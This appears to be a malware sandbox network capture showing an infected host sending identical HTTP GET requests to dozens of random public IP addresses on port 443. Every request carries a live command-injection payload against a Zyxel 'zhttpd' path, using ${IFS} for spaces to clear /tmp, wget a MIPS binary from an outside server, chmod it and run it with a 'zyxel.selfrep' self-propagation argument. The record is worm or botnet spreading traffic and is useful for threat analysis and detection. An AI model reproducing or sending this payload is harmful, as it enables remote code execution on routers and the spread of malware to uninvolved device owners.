                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701414108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2655192.168.2.2356270136.39.244.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701450109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2656192.168.2.2356152124.147.55.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701472044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2657192.168.2.235222044.251.75.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701487064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2658192.168.2.234146875.85.196.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701513052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2659192.168.2.23588169.69.239.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701575041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2660192.168.2.2355916116.9.250.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701580048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2661192.168.2.2344188126.251.194.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701617956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2662192.168.2.2343028188.101.153.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701636076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2663192.168.2.233675696.29.24.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701673985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2664192.168.2.2335974170.204.117.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701709032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2665192.168.2.233637858.245.68.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701757908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2666192.168.2.235732250.9.86.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701757908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2667192.168.2.234559075.183.140.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701795101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2668192.168.2.235847294.110.120.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701826096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2669192.168.2.2338394191.241.88.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701833963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2670192.168.2.234416225.113.121.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701881886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2671192.168.2.2355368213.129.206.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701920986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2672192.168.2.235202031.128.83.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701936007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2673192.168.2.234733659.96.153.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701962948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2674192.168.2.2354202173.164.43.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701988935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2675192.168.2.2347698155.177.55.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.702023029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2676192.168.2.2355210196.146.130.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.702079058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2677192.168.2.2353844137.98.37.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.702106953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2678192.168.2.235852472.171.161.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.702115059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2679192.168.2.2341684222.128.63.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.702142000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2680192.168.2.2336950150.244.85.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.702163935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2681192.168.2.233537458.4.219.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.702214956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2682192.168.2.233379642.87.15.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.702214956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2683192.168.2.2358826121.151.47.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.702240944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2684192.168.2.2334954104.187.157.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.702265024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2685192.168.2.233851452.3.197.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.702316046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2686192.168.2.235819827.119.109.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.702346087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2687192.168.2.235007019.209.235.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.702353001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2688192.168.2.235613478.84.210.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.702373028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2689192.168.2.2341990137.227.176.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.702404976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2690192.168.2.2353932197.118.245.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.702435017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2691192.168.2.233908065.203.99.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.702462912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2692192.168.2.234809852.89.27.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.702491999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2693192.168.2.233696454.141.77.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.702533960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2694192.168.2.2349662116.175.42.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.702547073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2695192.168.2.2350958108.67.168.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.702585936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2696192.168.2.234040486.165.67.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.702594042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2697192.168.2.2333814201.84.68.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.702622890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2698192.168.2.2333876194.122.246.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.702622890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2699192.168.2.235653471.136.2.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.702687979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2700192.168.2.2353136192.197.133.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.702713013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2701192.168.2.2352876187.253.124.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.702744007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2702192.168.2.236002677.249.225.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.702747107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2703192.168.2.2336768114.149.43.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.702797890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2704192.168.2.2358594185.188.41.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703005075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2705192.168.2.2347244213.68.213.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703032970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2706192.168.2.235513894.217.101.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703042030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2707192.168.2.2345776145.66.185.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703080893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2708192.168.2.2356346123.76.255.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703114033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2709192.168.2.235668442.206.170.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703135967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2710192.168.2.2351844213.182.94.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703155994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2711192.168.2.233387061.36.206.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703186989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2712192.168.2.234318835.150.2.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703218937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2713192.168.2.2348074149.217.11.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703233004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2714192.168.2.235138641.191.214.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703259945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2715192.168.2.2337596145.29.27.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.703284025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2716192.168.2.233758831.91.154.90443
                                                TimestampBytes transferredDirectionData
